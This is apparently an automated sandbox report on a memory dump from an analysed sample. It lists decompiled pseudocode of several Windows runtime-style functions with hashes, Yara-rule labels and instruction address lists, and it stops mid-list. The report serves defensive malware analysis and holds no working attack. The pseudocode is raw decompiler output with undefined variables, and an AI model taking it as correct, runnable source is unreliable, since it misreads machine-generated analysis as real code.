0x00000000
0x0304a824
0x0304a7ae
0x00000000
0x0304a7ae
0x0304a73c
0x0304a73e
0x00000000

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e3e77a7c107baea8b526324388888c11926ba3732f90fb9fb3dd18b81908ebe
Instruction ID: c16dd33398926dd1127a46eced262f03a8a5829ef5e8db007f435224881a8e65
Opcode Fuzzy Hash: 2e3e77a7c107baea8b526324388888c11926ba3732f90fb9fb3dd18b81908ebe
Instruction Fuzzy Hash: 2B31D2B17012049FD715EF08ED80F6ABBF9FB8C714F540969E0058B284D7B0BA81CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0301AA16, Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E0301AA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x310d360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x3107b9c; // 0x0
					_t53 = L03034620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E0305B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E0305F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L03026C59(_t53, _t51, _t58) != 0) {
							_t28 = E03045E50(0x2ffc338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E0304B230(_v32, _v28, 0x2ffc2d8, 1,  &_v24);
								_t28 = E0301F7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}

0x0301aa25
0x0301aa29
0x0301aa2d
0x0301aa30
0x0301aa37
0x0301aa3c
0x03074458
0x03074458
0x03074472
0x03074474
0x03074476
0x0301aa64
0x0301aa74
0x0307447c
0x03074483
0x03074492
0x0301aa52
0x0301aa54
0x0301aa5e
0x030744a8
0x030744ad
0x030744af
0x030744b6
0x030744b6
0x030744b9
0x030744bc
0x030744cd
0x030744d3
0x030744d6
0x030744e1
0x030744e1
0x030744e6
0x030744e8
0x030744fb
0x030744fb
0x030744e8
0x00000000
0x0301aa5e
0x03074476
0x0301aa42
0x0301aa46
0x0301aa48
0x0301aa4c
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f060c62a0b179d123e4869548186320b7e6cd43aa3cc3c95e4fdce487438099b
Instruction ID: b2b28fc2fa19d55bdd025f44bd3a44d33ef1c5ef4328737e1e322dcfeb820533
Opcode Fuzzy Hash: f060c62a0b179d123e4869548186320b7e6cd43aa3cc3c95e4fdce487438099b
Instruction Fuzzy Hash: A1312571A02229ABCF14EF65CD81ABFB7B9FF44700F44446AF905EB140E774A920DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 030461A0, Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E030461A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E03045E50(0x2ff67cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E030E9D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E0301F7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}

0x030461b3
0x030461b5
0x030461bd
0x030461c3
0x030461c7
0x030461d2
0x030461ff
0x030461ff
0x03046201
0x03046207
0x03046207
0x030461d4
0x030461d9
0x00000000
0x00000000
0x030461df
0x030461e2
0x00000000
0x00000000
0x030461e6
0x030461e8
0x030461ee
0x030461ee
0x030461f9
0x0308762f
0x03087632
0x03087635
0x03087639
0x03087640
0x0308766e
0x03087675
0x00000000
0x00000000
0x03087681
0x03087689
0x0308768d
0x03087691
0x03087695
0x03087699
0x030876af
0x030876b5
0x030876b7
0x030876b7
0x030876d7
0x030876dc
0x00000000
0x030876dc
0x030876a2
0x030876a9
0x03087651
0x03087653
0x03087653
0x03087656
0x03087656
0x00000000
0x03087656
0x03087644
0x03087646
0x03087648
0x03087648
0x00000000
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c92f0e72ad0f14dc611105ba1ae089610e36da87b741e44db54bda16eca199e4
Instruction ID: f1984de51d46b24aceed2a79a41970fe805a470cc3d247c4d0dfd827199d2aff
Opcode Fuzzy Hash: c92f0e72ad0f14dc611105ba1ae089610e36da87b741e44db54bda16eca199e4
Instruction Fuzzy Hash: 13317CB160A7019FD3A4DF19C900B2AF7E4FB88B00F19496DE9989B361E771D904CB91

Uniqueness

Uniqueness Score: -1.00%

Function 03054A2C, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E03054A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x310d360 ^ _t62;
				_v8 =  *0x310d360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E03032280(_t26, 0x3108608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E0302FFB0(_t41, _t51, 0x3108608);
						L2:
						 *0x310b1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E0305B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E03032280(_t28, 0x3108608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E0302FFB0(_t42, _t53, 0x3108608);
							if(_t53 != 0) {
								L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E0302FFB0(_t41, _t51, 0x3108608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}

0x03054a2c
0x03054a34
0x03054a3c
0x03054a3e
0x03054a48
0x03054a4b
0x03054a4d
0x03054a51
0x03054a9c
0x00000000
0x00000000
0x03054aa3
0x03054aa8
0x03054aad
0x03054ab1
0x03054ade
0x03054ae3
0x03054a5a
0x03054a62
0x03054a6a
0x03054a6e
0x0308f203
0x03054a84
0x03054a88
0x03054a89
0x03054a8a
0x03054a95
0x03054a95
0x03054a79
0x03054a80
0x03054af2
0x03054af4
0x03054af9
0x03054aff
0x03054b01
0x03054b03
0x03054b08
0x0308f20a
0x0308f212
0x0308f216
0x0308f216
0x03054b08
0x03054b13
0x03054b1a
0x0308f229
0x0308f229
0x03054b1a
0x03054a82
0x00000000
0x03054a82
0x03054ab7
0x03054acd
0x03054acd
0x03054ad5
0x03054ada
0x00000000
0x03054ada
0x03054ac2
0x03054acb
0x00000000
0x00000000
0x00000000
0x03054acb
0x03054a53
0x03054a53
0x03054a58
0x00000000

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbb1293e585b3dacdd491094abad0fd3039eb3f44f8851ef2e31ded1c20a6ac0
Instruction ID: 912aad23bf574ffe28a3610fb2d97f91b5ab6ac952089197820eb5b4e865cc06
Opcode Fuzzy Hash: fbb1293e585b3dacdd491094abad0fd3039eb3f44f8851ef2e31ded1c20a6ac0
Instruction Fuzzy Hash: D93101322073549BC7A1EF25C945BAFBBE8FFC9A00F054869F8560B641C7B0D880CB85

Uniqueness

Uniqueness Score: -1.00%

Function 03058EC7, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E03058EC7(void* __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int* _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char* _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr _v152;
				char _v156;
				intOrPtr _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x310d360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E03044E70(0x31086e4, 0x3059490, 0, 0);
					if( *0x31053e8 > 5 && E03058F33(0x31053e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x31053e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x31053e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x2ffbc46;
						_t48 = E03097B9C(0x31053e8, 0x2ffbc46, _t67, 0x31053e8, _t70,  &_v140);
					}
				}
				return E0305B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}

0x03058ec7
0x03058ed9
0x03058edc
0x03058ee6
0x03058ee9
0x03058eee
0x03058efc
0x03058f08
0x03091349
0x03091353
0x0309135d
0x03091366
0x0309136f
0x03091375
0x0309137c
0x03091385
0x03091390
0x03091391
0x0309139c
0x0309139d
0x030913a6
0x030913ac
0x030913b2
0x030913b5
0x030913bc
0x030913bf
0x030913c2
0x030913c5
0x030913c8
0x030913cb
0x030913ce
0x030913d1
0x030913d4
0x030913d7
0x030913da
0x030913dd
0x030913e0
0x030913e3
0x030913e6
0x030913e9
0x030913f6
0x03091400
0x03091400
0x03058f08
0x03058f32

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d489fddf0dfa449943a50a1b8f06819ae8f776f416dc55a2e4d36cf356664b1
Instruction ID: c8fe289183d4175ac58f6ea9eefe5879992635a097b6da0998c4d22cdd67642b
Opcode Fuzzy Hash: 9d489fddf0dfa449943a50a1b8f06819ae8f776f416dc55a2e4d36cf356664b1
Instruction Fuzzy Hash: 7241A1B5D013189FDB24CFAAD980AAEFBF4FB48710F5081AEE909A7240D7705A84CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0304E730, Relevance: .1, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E0304E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E03059670() < 0) {
					L0306DF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x3107b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L03034620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M0304E810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

0x0304e730
0x0304e736
0x0304e738
0x0304e73d
0x0304e73e
0x0304e740
0x0304e749
0x0304e765
0x0304e76a
0x0304e76b
0x0304e76c
0x0304e76d
0x0304e76e
0x0304e76f
0x0304e775
0x0304e777
0x0304e77e
0x0308b675
0x0304e784
0x0304e784
0x0304e789
0x0304e7a8
0x0304e7ac
0x0304e807
0x0304e7ae
0x0304e7ae
0x0304e7b1
0x0304e7b4
0x0304e7b9
0x0304e7c0
0x0304e7c4
0x0304e7ca
0x0304e7cc
0x00000000
0x0304e7d3
0x0304e7d6
0x00000000
0x00000000
0x0304e7ff
0x0304e802
0x00000000
0x00000000
0x0304e7f9
0x0304e7fc
0x00000000
0x00000000
0x0304e7f3
0x0304e7f6
0x00000000
0x00000000
0x0304e7ed
0x0304e7f0
0x00000000
0x00000000
0x0304e7e7
0x0304e7ea
0x00000000
0x00000000
0x0308b685
0x0308b688
0x00000000
0x00000000
0x0308b682
0x00000000
0x00000000
0x0304e7cc
0x0304e7d9
0x0304e7dc
0x0304e7de
0x0304e7de
0x0304e7ac
0x0304e7e4
0x0304e74b
0x0304e751
0x0304e759
0x0304e761
0x0304e761

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 024142f3ea4b3a1f9e1a3f8823fc13496889cc8dcc4a87f9545679d4310272da
Instruction ID: 5b19ed0d43a027f2afb4b0ef7f52255151f3858f80d4e5a2fbf5d271cc30e7c8
Opcode Fuzzy Hash: 024142f3ea4b3a1f9e1a3f8823fc13496889cc8dcc4a87f9545679d4310272da
Instruction Fuzzy Hash: C33191B5A15249EFD744CF58C940F9AB7E8FB09324F148666F908CB341D671ED80CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0304BC2C, Relevance: .1, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0304BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x3106100; // 0x47
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E03032280(0xd, 0xf51f1a0);
				_t41 =  *0x31060f8; // 0x0
				if(_t41 != 0) {
					 *0x31060f8 =  *_t41;
					 *0x31060fc =  *0x31060fc + 0xffff;
				}
				E0302FFB0(_t41, 0x800, 0xf51f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x31060f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L03034620(0x3106100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x3106100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}

0x0304bc36
0x0304bc42
0x0304bc45
0x0304bc4a
0x0304bd35
0x00000000
0x00000000
0x00000000
0x00000000
0x0304bc50
0x0304bc50
0x0304bc58
0x0304bc5a
0x0304bc60
0x00000000
0x00000000
0x0308a4f2
0x0308a4f6
0x00000000
0x00000000
0x00000000
0x0308a4fc
0x0304bc79
0x0304bc7e
0x0304bc86
0x0304bd16
0x0304bd20
0x0304bd20
0x0304bc8d
0x0304bc94
0x0304bcbd
0x0304bcca
0x0304bccb
0x0304bccc
0x0304bccd
0x0304bcce
0x0304bcd4
0x0304bcea
0x0304bcee
0x0304bcf2
0x0304bd00
0x0304bd04
0x00000000
0x0304bc96
0x0304bcab
0x0304bcaf
0x0304bd2c
0x0304bd2c
0x0304bd09
0x00000000
0x0304bd09
0x0304bcb1
0x0304bcb5
0x0304bcbb
0x00000000
0x00000000
0x00000000
0x0304bcbb

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f922efc3e11e62f924cd55b216ec113df73bc974083238401e6f6ec0f7575e5d
Instruction ID: 693579ce851a5e6a74d27c10f4ae0d9a4328821faea5c324e49ef36abb4cc236
Opcode Fuzzy Hash: f922efc3e11e62f924cd55b216ec113df73bc974083238401e6f6ec0f7575e5d
Instruction Fuzzy Hash: C13101B6A026159BCB51EF58D4C07AA73A8FF58314F0444B9ED84DB209EBB4DA458B90

Uniqueness

Uniqueness Score: -1.00%

Function 03019100, Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E03019100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x30ef6e8);
				E0306D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E030E88F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E0306D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x31086c0; // 0x14107b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x31086b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E03032280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E030E88F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E0305AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x310b1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x31084c0;
										if(_t69 >=  *0x31084c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E030E9063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E0301922A(_t82);
							_t53 = E03037D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E030E8B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x31086c0; // 0x14107b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x31086b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x31086bc;
										_t72 = 0x31086b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E03019240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x31086c4;
									_t72 = 0x31086c0;
									L18:
									E03049B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}

0x03019100
0x03019100
0x03019100
0x03019100
0x03019102
0x03019107
0x0301910c
0x03019110
0x03019115
0x03019136
0x03019143
0x030737e4
0x030737e4
0x03019149
0x0301914e
0x0301914e
0x03019117
0x0301911d
0x00000000
0x00000000
0x0301911f
0x03019125
0x00000000
0x03019151
0x03019158
0x0301915d
0x03019161
0x03019168
0x03073715
0x00000000
0x0301916e
0x0301916e
0x03019175
0x03019177
0x0301917e
0x0301917f
0x03019182
0x03019182
0x03019187
0x03019187
0x0301918a
0x0301918d
0x0301918f
0x03019192
0x03019195
0x03019198
0x03019198
0x03019198
0x0301919a
0x00000000
0x00000000
0x0307371f
0x03073721
0x03073727
